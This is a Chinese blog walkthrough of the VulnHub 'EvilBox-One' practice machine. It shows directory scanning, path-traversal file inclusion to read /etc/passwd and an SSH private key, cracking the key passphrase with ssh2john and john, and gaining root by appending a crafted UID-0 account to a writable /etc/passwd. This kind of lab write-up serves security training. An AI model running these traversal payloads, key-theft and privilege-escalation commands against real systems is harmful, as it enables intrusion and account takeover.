EvilBox---One靶场实战

最新推荐文章于 2024-01-20 20:19:34 发布
最新推荐文章于 2024-01-20 20:19:34 发布
阅读量225 收藏
点赞数
文章标签: 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72212352/article/details/134215253
版权

一、主机信息

kali:192.168.21.31
EvilBox---One:192.168.21.51

二、实战步骤

1.先使用fscan对目标ip进行扫描

发现开放了80和22端口

2.存在web服务,访问web网站

3.进行目录扫描,获取更多信息

dirsearch -u "http://192.168.21.51"

4.当访问robots.txt目录时出现一个疑似用户

5.访问secret目录时是空白页面,没有可用信息

6.使用gobuster对该目录进行进一步扫描,又扫描出evil.php目录

gobuster dir -u http://192.168.21.51/secret/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

注:御剑也可以扫描出该目录

访问时依旧是空白页面

7.疑似存在文件包含漏洞

使用wfuzz工具进行模糊测试,得到参数command

wfuzz -u "192.168.21.51/secret/evil.php?FUZZ=../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/common.txt --hw 0

8.访问http://192.168.21.51/secret/evil.php?command=/etc/passwd查看/etc/passw文件内容,发现mowree用户

9.由于开放了22端口,尝试远程连接,看是否能使用密钥对登录,找到mowree的密钥

注:一般用户的 .ssh 目录下会存在三个文件:
​
1. id_rsa : 私钥。
2. authorized_keys : 认证关键字文件。
3. id_rsa.pub : 公钥。

查看私钥

查看公钥,显示空页面

查看认证关键字有用户信息: 用户名@主机名

10.复制私钥内容保存在kali中

11.id_rsa 可以用于ssh登陆,但缺少密码,需要破解密码,需要用到一个脚本: ssh2john

下载地址:

https://github.com/aniello001/ssh2john

python3 ssh2john.py id-rsa > hash.txt

使用john破解密码,使用kali自带的字典:/usr/share/john/password.lst

john --wordlist=/usr/share/john/password.lst hash.txt

12.得到密码为unicorn,进行ssh连接

注:使用自己复制粘贴的密钥文件连接时会出现以下两个错(文件不符合和权限错误)

原因是由于查询到的密钥文件内容直接复制,然后在kali本地粘贴这些内容导致的。

解决方法:从目标主机将私钥原始文件下载到本地

在目标主机中将私钥文件放置到网站根目录

在kali中下载密钥文件到本地

修改该密钥文件权限

之后就可以成功连接

13.查看当前路径发现存在user.txt文件,查看内容得到第一个flag

14.查看当前用户权限较低,尝试提权收集更多信息

15.提权

(1)查看/etc/passwd文件发现具有写的权限

可以在passwd文件中添加一个新的root权限的账户

(2)在kali中使用openssl工具生成加盐hash值

openssl passwd -1 -salt asd 123456

(3)按照root账户的格式写入到/etc/passwd文件中

echo 'asd:$1$asd$iWcDBoNk0ETbqlPMf93pE1:0:0::/root:/bin/bash' >> /etc/passwd

(4)切换asd用户,输入密码后成功切换到root账户

16.进入root目录下发现root.txt文件,查看其内容得到第二个flag

归零&
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
VnlnHub EvilBox---One
weixin_45682839的博客
09-07 869
VnlnHub EvilBox---One靶场通关攻略记录,涉及知识包括:端口服务探测、铭感目录搜集、参数爆破、任意文件包含漏洞、任意文件读取、ssh私钥爆破、linux本地提权(系统权限漏洞提权)
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
vulnhub之EvilBox: One
qwweggfe的博客
09-01 1054
文章目录 信息搜集 网页渗透 提权 总结 前言 目前网络安全越来越受到国家的重视,你可以通过本次黑盒的学习,学习到一些关于网络安全的知识,希望对您有所帮助! 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 首先进行IP扫描 让我们看看看他开启了哪些端口 nmap -sC -sV 192.168.181.157 -p- -v --min-rate=20000 由于80端口打开,于是进行网页访问 于是进行目录扫描 gobuster dir -...
Vulnhub靶机_EVILBOX: ONE
学术渣渣的博客
10-25 519
文章目录靶机信息渗透过程获取靶机IP端口扫描网站目录扫描 靶机信息 下载地址:http://www.vulnhub.com/entry/evilbox-one,736/ 难易程度:简单 渗透过程 获取靶机IP 这个靶机启动后会显示IP地址:192.168.1.103 用主机扫描也可以扫到: arp-scan -l 端口扫描 这里开放了两个端口:22,80。 nmap -A -T4 -p 1-65535 192.168.1.103 网站目录扫描 首先扫描一下特殊文件,这里扫描到一个robots.tx
【每日打靶练习】vulnhub--Evilbox-One(中低)
leo788的博客
01-24 350
通过修改/etc/passwd中的root的密码即可,但是这里靶机的vim我无法进行修改,应该是版本问题,所以前面操作仅供参考,后面按照顺序修改完用户密码后即可登录,达到越权目的。利用ffuf来进行模糊匹配,前一个字典用来匹配参数关键字,后一个字典自己定义用来匹配执行,结果是啥也没匹配到,考虑换一个思路,利用是php格式,猜测页面是否存在文件包含漏洞,然后再利用远程包含上传webshell进行提权的思路,测试一下。访问一下80端口,没什么信息,对目录进行扫描。secret页面:空的,查看源码也空。
EvilBox---One靶机复盘
weixin_44681307的博客
07-16 305
既然能扫到带php的目录,自然而然就联想到了文件包含漏洞,因为也没别的太多线索,就对这个目录进行了一个爆破,看看有没有文件包含漏洞。扫描目录的时候只有一个secret目录有点意思,就又单独对这个目录进行了一个扫描,发现这个目录下还有一个文件。这里又给私钥文件把权限降低了,发现果然可以登陆,不过需要输入密码,所以我们可以对私钥进行一个单独的爆破。这样就可以直接对私钥进行密码爆破,很快密码也就出来了,如果发现不能爆破请删除当前目录下的.john文件。发现成功登陆了上来,sudo命令是没有的,并且又。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-bypass靶场
11-10
sqli-bypass靶场
vuInhub靶场实战系列-DC-9实战
06-02
vuInhub靶场实战系列-DC-9实战
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 2874
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
EvilBox-one靶机实验实战演练
lianliandad的博客
11-01 843
好好学习
EvilBox(vulnhub)
wcl20010的博客
05-04 407
EvilBox 目录 EvilBox: One ~ VulnHub 1.主机发现 arp-scan -l namp -Pn 192.168.56.0 2.端口扫描 nmap -p22.80 -sV 192.168.56.105 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 3.目录扫描 dirsearch
打靶第六周-EvilBox---One
wcwdnmdnmd的博客
04-09 3248
打靶第六周-EvilBox---One
Evilbox-One靶机打靶过程与思路
qq_52610024的博客
04-21 2522
没有有效信息,思考是否可能有写入权限,php//filter/write=convert.base64-decode/resource=test.php&txt=MTIz。-wval.txtVAL-uhttp//10.0.2.26/secret/evil.php?/home/mowree/.ssh/id_rsa。查找suid文件权限find/-perm/40002>/dev/null4000是suid权限位置,后面是将报错文件放置到空白目录中。/etc/passswd。...
VulnHub日记(十一):EvilBox-One
Dawn_Xi的博客
09-28 1619
靶机介绍 虚拟机链接:EvilBox: One ~ VulnHub 参考博客:EvilBox Writeup - Vulnhub - Walkthrough - Security 开始练习 本机ip:192.168.56.102 虚拟机ip:192.168.56.125 netdiscover查找ip ediscover -r 192.168.56.0/24 nmap扫描开放端口及服务 nmap -A 192.168.56.125 访问80端口并使用dirsearch扫描..
evil-box靶场记录
胖虎的博客
11-16 1083
evilbox渗透测试记录
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5392
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulnhub靶机:EvilBox-One
qq_48904485的博客
01-20 842
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:EvilBox-One(10.0.2.25)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/evilbox-one,736/
EvilBox---One
09-04
EvilBox—One是一个靶场,可以用于进行网络安全演练和渗透测试。你可以从靶场的官网地址https://download.vulnhub.com/evilbox/EvilBox—One.ova下载靶场的镜像文件进行安装。 在靶场中,你可以使用不同的工具和技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值